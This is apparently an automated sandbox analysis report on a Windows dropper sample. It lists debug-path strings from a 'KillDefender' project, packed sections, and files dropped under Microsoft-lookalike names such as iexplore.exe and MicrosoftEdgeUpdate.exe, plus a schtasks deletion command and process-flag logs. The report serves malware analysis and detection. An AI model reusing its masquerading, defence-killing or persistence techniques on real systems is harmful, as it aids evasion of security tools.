Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb3 source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: System.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: System.Core.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb3 source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\select.pdb source: select.pyd.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_elementtree.pdb source: _elementtree.pyd.15.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.pdb source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\python37.pdb source: python37.dll.15.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb.-H- :-_CorExeMainmscoree.dll source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: C:\codes\start\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000000.1954911715.000001B9E5942000.00000002.00000001.01000000.00000008.sdmp, MicrosoftEdgeUpdate.exe, 0000000E.00000002.2200183352.000001B9E751E000.00000004.00000800.00020000.00000000.sdmp, MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: mscorlib.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_ctypes.pdb source: _ctypes.pyd.15.dr
Source: Binary string: System.Core.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.ni.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe.21c19320000.0.unpack =0aP:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static PE information: 0xCF2C0F01 [Wed Feb 21 19:58:57 2080 UTC]
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static PE information: section name: =0aP
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static PE information: section name:
Source: VCRUNTIME140.dll.15.dr Static PE information: section name: _RDATA
Source: opencv_videoio_ffmpeg480.dll.15.dr Static PE information: section name: .rodata
Source: libcrypto-1_1.dll.15.dr Static PE information: section name: .00cfg
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /4
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /14
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /29
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /41
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /55
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /67
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /80
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /91
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.dr Static PE information: section name: /102
Source: libssl-1_1.dll.15.dr Static PE information: section name: .00cfg
Source: cv2.pyd.15.dr Static PE information: section name: IPPCODE
Source: cv2.pyd.15.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B98D2A5 pushad ; iretd 2_2_00007FFD9B98D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BAA83D3 push cs; iretd 2_2_00007FFD9BAA841A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BAA8AAC push eax; iretd 2_2_00007FFD9BAA8ABA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BAA20A8 push E95EAFD2h; ret 2_2_00007FFD9BAA20E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB72316 push 8B485F94h; iretd 2_2_00007FFD9BB7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFD9BAC27D4 push ebp; retf 20_2_00007FFD9BAC2832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_00007FFD9BAB19BA pushad ; ret 27_2_00007FFD9BAB19C9

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe File written: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Process created: "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe File created: C:\ProgramData\Microsoft\Bound.exe
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pyd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe File created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pyd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe File created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-math-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-process-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_lzma.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\libcrypto-1_1.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-string-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-util-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_ssl.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\select.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\libssl-1_1.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\_elementtree.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dll

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\Bound.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
